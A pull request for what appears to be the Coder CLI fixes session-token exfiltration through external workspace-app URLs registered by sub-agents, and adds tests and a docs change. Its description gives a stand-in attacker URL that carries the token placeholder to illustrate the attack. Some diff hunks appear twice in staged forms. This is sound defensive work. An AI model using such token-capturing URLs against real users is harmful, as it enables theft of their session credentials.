### PR TITLE
fix: prevent session token exfiltration via external app URLs

### DIFF
--- a/cli/clitest/clitest.go
+++ b/cli/clitest/clitest.go
@@ -256,12 +256,6 @@ func (w *ErrorWaiter) RequireContains(s string) {
 	require.ErrorContains(w.t, w.Wait(), s)
 }
 
-func (w *ErrorWaiter) RequireNotContains(s string) {
-	err := w.Wait()
-	require.Error(w.t, err)
-	require.NotContains(w.t, err.Error(), s)
-}
-
 func (w *ErrorWaiter) RequireIs(want error) {
 	require.ErrorIs(w.t, w.Wait(), want)
 }

--- a/cli/clitest/clitest.go
+++ b/cli/clitest/clitest.go
@@ -256,6 +256,12 @@ func (w *ErrorWaiter) RequireContains(s string) {
 	require.ErrorContains(w.t, w.Wait(), s)
 }
 
+func (w *ErrorWaiter) RequireNotContains(s string) {
+	err := w.Wait()
+	require.Error(w.t, err)
+	require.NotContains(w.t, err.Error(), s)
+}
+
 func (w *ErrorWaiter) RequireIs(want error) {
 	require.ErrorIs(w.t, w.Wait(), want)
 }

--- a/cli/open.go
+++ b/cli/open.go
@@ -392,17 +392,13 @@ func (r *RootCmd) openApp() *serpent.Command {
 			pathAppURL := strings.TrimPrefix(region.PathAppURL, baseURL.String())
 			appURL := buildAppLinkURL(baseURL, ws, agt, foundApp, region.WildcardHostname, pathAppURL)
 
-			if foundApp.External {
-				// Sub-agent apps are attacker-influenceable through workspace
-				// configuration (e.g. devcontainer.json) and runtime sub-agent
-				// registration. Never substitute the user's session token into
-				// their URLs. Template-defined apps run on a top-level agent
-				// and are admin-authored, so their URLs are trusted.
-				if !agt.ParentID.Valid {
-					appURL = strings.ReplaceAll(appURL, externalSessionTokenPlaceholder, client.SessionToken())
-				} else if strings.Contains(appURL, externalSessionTokenPlaceholder) {
-					cliui.Warnf(inv.Stderr, "This app was registered from inside the workspace rather than from the workspace template. For security, the session token will not be substituted into the URL.")
-				}
+			externalSubAgentApp := foundApp.External && agt.ParentID.Valid
+			if foundApp.External && !agt.ParentID.Valid {
+				// Template-defined apps run on a top-level agent and are
+				// admin-authored, so their URLs are trusted. Substitute the
+				// session token placeholder so the OS open handler receives
+				// a usable URL.
+				appURL = strings.ReplaceAll(appURL, externalSessionTokenPlaceholder, client.SessionToken())
 			}
 
 			// Check if we're inside a workspace.  Generally, we know
@@ -410,6 +406,18 @@ func (r *RootCmd) openApp() *serpent.Command {
 			insideAWorkspace := inv.Environ.Get("CODER") == "true"
 			if insideAWorkspace {
 				_, _ = fmt.Fprintf(inv.Stderr, "Please open the following URI on your local machine:\n\n")
+				_, _ = fmt.Fprintf(inv.Stdout, "%s\n", appURL)
+				return nil
+			}
+
+			// Sub-agent external app URLs are set at runtime. Only open
+			// sub-agent URLs that don't contain the placeholder to prevent
+			// token exfiltration.
+			if externalSubAgentApp && strings.Contains(appURL, externalSessionTokenPlaceholder) {
+				cliui.Warnf(inv.Stderr,
+					"This app was registered from inside the workspace rather than from the workspace template. "+
+						"Inspect the URL below carefully and, if you trust the source, substitute the $SESSION_TOKEN placeholder "+
+						"with your session token and manually open it:")
 				_, _ = fmt.Fprintf(inv.Stdout, "%s\n", appURL)
 				return nil
 			}

--- a/cli/open.go
+++ b/cli/open.go
@@ -39,6 +39,11 @@ func (r *RootCmd) open() *serpent.Command {
 
 const vscodeDesktopName = "VS Code Desktop"
 
+// externalSessionTokenPlaceholder is the literal substring in an external
+// workspace-app URL that the CLI replaces with the user's session token
+// when the app belongs to a trusted (top-level) agent.
+const externalSessionTokenPlaceholder = "$SESSION_TOKEN"
+
 func (r *RootCmd) openVSCode() *serpent.Command {
 	var (
 		generateToken bool
@@ -388,7 +393,16 @@ func (r *RootCmd) openApp() *serpent.Command {
 			appURL := buildAppLinkURL(baseURL, ws, agt, foundApp, region.WildcardHostname, pathAppURL)
 
 			if foundApp.External {
-				appURL = replacePlaceholderExternalSessionTokenString(client, appURL)
+				// Sub-agent apps are attacker-influenceable through workspace
+				// configuration (e.g. devcontainer.json) and runtime sub-agent
+				// registration. Never substitute the user's session token into
+				// their URLs. Template-defined apps run on a top-level agent
+				// and are admin-authored, so their URLs are trusted.
+				if !agt.ParentID.Valid {
+					appURL = strings.ReplaceAll(appURL, externalSessionTokenPlaceholder, client.SessionToken())
+				} else if strings.Contains(appURL, externalSessionTokenPlaceholder) {
+					cliui.Warnf(inv.Stderr, "This app was registered from inside the workspace rather than from the workspace template. For security, the session token will not be substituted into the URL.")
+				}
 			}
 
 			// Check if we're inside a workspace.  Generally, we know
@@ -663,16 +677,4 @@ func buildAppLinkURL(baseURL *url.URL, workspace codersdk.Workspace, agent coder
 		u.Path = "/"
 	}
 	return u.String()
-}
-
-// replacePlaceholderExternalSessionTokenString replaces any $SESSION_TOKEN
-// strings in the URL with the actual session token.
-// This is consistent behavior with the frontend. See: site/src/modules/resources/AppLink/AppLink.tsx
-func replacePlaceholderExternalSessionTokenString(client *codersdk.Client, appURL string) string {
-	if !strings.Contains(appURL, "$SESSION_TOKEN") {
-		return appURL
-	}
-
-	// We will just re-use the existing session token we're already using.
-	return strings.ReplaceAll(appURL, "$SESSION_TOKEN", client.SessionToken())
 }

--- a/cli/open_test.go
+++ b/cli/open_test.go
@@ -1,6 +1,7 @@
 package cli_test
 
 import (
+	"bytes"
 	"context"
 	"database/sql"
 	"net/url"
@@ -731,12 +732,14 @@ func TestOpenApp(t *testing.T) {
 		w.RequireContains(client.SessionToken())
 	})
 
-	t.Run("ExternalAppOnSubAgentOpensAsIs", func(t *testing.T) {
+	t.Run("ExternalAppOnSubAgentWithPlaceholderPrintsURLAndDoesNotOpen", func(t *testing.T) {
 		t.Parallel()
 
 		// Sub-agent app URLs are attacker-influenceable through workspace
-		// configuration and runtime registration. Even with an allowlisted
-		// scheme the CLI must not substitute the user's session token.
+		// configuration and runtime registration. The CLI must not
+		// substitute the session token, and must not hand the URL to the
+		// OS open handler. The URL is printed to stdout so a user who
+		// trusts the source can substitute and open it manually.
 		ownerClient, store := coderdtest.NewWithDatabase(t, nil)
 		ownerClient.SetLogger(testutil.Logger(t).Named("client"))
 		first := coderdtest.CreateFirstUser(t, ownerClient)
@@ -764,11 +767,56 @@ func TestOpenApp(t *testing.T) {
 
 		inv, root := clitest.New(t, "open", "app", r.Workspace.Name+".devcontainer", "subapp", "--test.open-error")
 		clitest.SetupConfig(t, userClient, root)
+		var stdout, stderr bytes.Buffer
+		inv.Stdout = &stdout
+		inv.Stderr = &stderr
+
+		w := clitest.StartWithWaiter(t, inv)
+		w.RequireSuccess()
+		require.NotContains(t, stderr.String(), "test.open-error")
+		require.NotContains(t, stdout.String(), "test.open-error")
+		require.Contains(t, stdout.String(), "vscode://coder.coder-remote/open?token=$SESSION_TOKEN")
+		require.NotContains(t, stdout.String(), userClient.SessionToken())
+		require.Contains(t, stderr.String(), "substitute")
+	})
+
+	t.Run("ExternalAppOnSubAgentWithoutPlaceholderOpensAsIs", func(t *testing.T) {
+		t.Parallel()
+
+		// Sub-agent app URLs that don't reference $SESSION_TOKEN carry no
+		// token to leak. The CLI auto-opens them like any other external
+		// app; only placeholder-bearing URLs are gated.
+		ownerClient, store := coderdtest.NewWithDatabase(t, nil)
+		ownerClient.SetLogger(testutil.Logger(t).Named("client"))
+		first := coderdtest.CreateFirstUser(t, ownerClient)
+		userClient, user := coderdtest.CreateAnotherUserMutators(t, ownerClient, first.OrganizationID, nil, func(r *codersdk.CreateUserRequestWithOrgs) {
+			r.Username = "subagentowner2"
+		})
+		r := dbfake.WorkspaceBuild(t, store, database.WorkspaceTable{
+			Name:           "subagentws2",
+			OrganizationID: first.OrganizationID,
+			OwnerID:        user.ID,
+		}).WithAgent().Do()
+
+		require.NotEmpty(t, r.Agents, "expected at least one workspace agent")
+		mainAgent := r.Agents[0]
+
+		subAgent := dbgen.WorkspaceSubAgent(t, store, mainAgent, database.WorkspaceAgent{
+			Name: "devcontainer",
+		})
+		_ = dbgen.WorkspaceApp(t, store, database.WorkspaceApp{
+			AgentID:  subAgent.ID,
+			Slug:     "subapp",
+			External: true,
+			Url:      sql.NullString{Valid: true, String: "https://example.com/some/path"},
+		})
+
+		inv, root := clitest.New(t, "open", "app", r.Workspace.Name+".devcontainer", "subapp", "--test.open-error")
+		clitest.SetupConfig(t, userClient, root)
 
 		w := clitest.StartWithWaiter(t, inv)
 		w.RequireError()
 		w.RequireContains("test.open-error")
-		w.RequireContains("$SESSION_TOKEN")
-		w.RequireNotContains(userClient.SessionToken())
+		w.RequireContains("https://example.com/some/path")
 	})
 }

--- a/cli/open_test.go
+++ b/cli/open_test.go
@@ -2,6 +2,7 @@ package cli_test
 
 import (
 	"context"
+	"database/sql"
 	"net/url"
 	"os"
 	"path"
@@ -21,6 +22,9 @@ import (
 	"github.com/coder/coder/v2/agent/agenttest"
 	"github.com/coder/coder/v2/cli/clitest"
 	"github.com/coder/coder/v2/coderd/coderdtest"
+	"github.com/coder/coder/v2/coderd/database"
+	"github.com/coder/coder/v2/coderd/database/dbfake"
+	"github.com/coder/coder/v2/coderd/database/dbgen"
 	"github.com/coder/coder/v2/coderd/database/dbtime"
 	"github.com/coder/coder/v2/codersdk"
 	"github.com/coder/coder/v2/provisionersdk/proto"
@@ -703,14 +707,16 @@ func TestOpenApp(t *testing.T) {
 		w.RequireContains("region not found")
 	})
 
-	t.Run("ExternalAppSessionToken", func(t *testing.T) {
+	t.Run("ExternalAppOnTopLevelAgentSubstitutes", func(t *testing.T) {
 		t.Parallel()
 
+		// Apps on the top-level (template-defined) agent are trusted, so the
+		// CLI substitutes $SESSION_TOKEN regardless of scheme.
 		client, ws, _ := setupWorkspaceForAgent(t, func(agents []*proto.Agent) []*proto.Agent {
 			agents[0].Apps = []*proto.App{
 				{
 					Slug:     "app1",
-					Url:      "https://example.com/app1?token=$SESSION_TOKEN",
+					Url:      "vscode://coder.coder-remote/open?token=$SESSION_TOKEN",
 					External: true,
 				},
 			}
@@ -723,5 +729,46 @@ func TestOpenApp(t *testing.T) {
 		w.RequireError()
 		w.RequireContains("test.open-error")
 		w.RequireContains(client.SessionToken())
+	})
+
+	t.Run("ExternalAppOnSubAgentOpensAsIs", func(t *testing.T) {
+		t.Parallel()
+
+		// Sub-agent app URLs are attacker-influenceable through workspace
+		// configuration and runtime registration. Even with an allowlisted
+		// scheme the CLI must not substitute the user's session token.
+		ownerClient, store := coderdtest.NewWithDatabase(t, nil)
+		ownerClient.SetLogger(testutil.Logger(t).Named("client"))
+		first := coderdtest.CreateFirstUser(t, ownerClient)
+		userClient, user := coderdtest.CreateAnotherUserMutators(t, ownerClient, first.OrganizationID, nil, func(r *codersdk.CreateUserRequestWithOrgs) {
+			r.Username = "subagentowner"
+		})
+		r := dbfake.WorkspaceBuild(t, store, database.WorkspaceTable{
+			Name:           "subagentws",
+			OrganizationID: first.OrganizationID,
+			OwnerID:        user.ID,
+		}).WithAgent().Do()
+
+		require.NotEmpty(t, r.Agents, "expected at least one workspace agent")
+		mainAgent := r.Agents[0]
+
+		subAgent := dbgen.WorkspaceSubAgent(t, store, mainAgent, database.WorkspaceAgent{
+			Name: "devcontainer",
+		})
+		_ = dbgen.WorkspaceApp(t, store, database.WorkspaceApp{
+			AgentID:  subAgent.ID,
+			Slug:     "subapp",
+			External: true,
+			Url:      sql.NullString{Valid: true, String: "vscode://coder.coder-remote/open?token=$SESSION_TOKEN"},
+		})
+
+		inv, root := clitest.New(t, "open", "app", r.Workspace.Name+".devcontainer", "subapp", "--test.open-error")
+		clitest.SetupConfig(t, userClient, root)
+
+		w := clitest.StartWithWaiter(t, inv)
+		w.RequireError()
+		w.RequireContains("test.open-error")
+		w.RequireContains("$SESSION_TOKEN")
+		w.RequireNotContains(userClient.SessionToken())
 	})
 }

--- a/docs/user-guides/devcontainers/customizing-dev-containers.md
+++ b/docs/user-guides/devcontainers/customizing-dev-containers.md
@@ -247,27 +247,6 @@ Standard dev container variables are also available:
 | `${containerWorkspaceFolder}` | Workspace folder path inside the container |
 | `${localWorkspaceFolder}`     | Workspace folder path on the host          |
 
-### Session token
-
-Use `$SESSION_TOKEN` in external app URLs to include the user's session token:
-
-```json
-{
-  "customizations": {
-    "coder": {
-      "apps": [
-        {
-          "slug": "custom-ide",
-          "displayName": "Custom IDE",
-          "url": "custom-ide://open?token=$SESSION_TOKEN&folder=${containerWorkspaceFolder}",
-          "external": true
-        }
-      ]
-    }
-  }
-}
-```
-
 ## Feature options as environment variables
 
 When your dev container uses features, Coder exposes feature options as


### PR DESCRIPTION
`coder open app` substituted the user's session token into any external workspace-app URL containing `$SESSION_TOKEN` before opening, letting a malicious sub-agent exfiltrate the token via a URL like `https://attacker.example/?t=$SESSION_TOKEN`.

Substitution is now restricted to URLs from top-level (template-authored) agents. Sub-agent URLs that still contain `$SESSION_TOKEN` are printed for the user to inspect and substitute manually rather than opened automatically. Sub-agent URLs without the placeholder are unaffected.
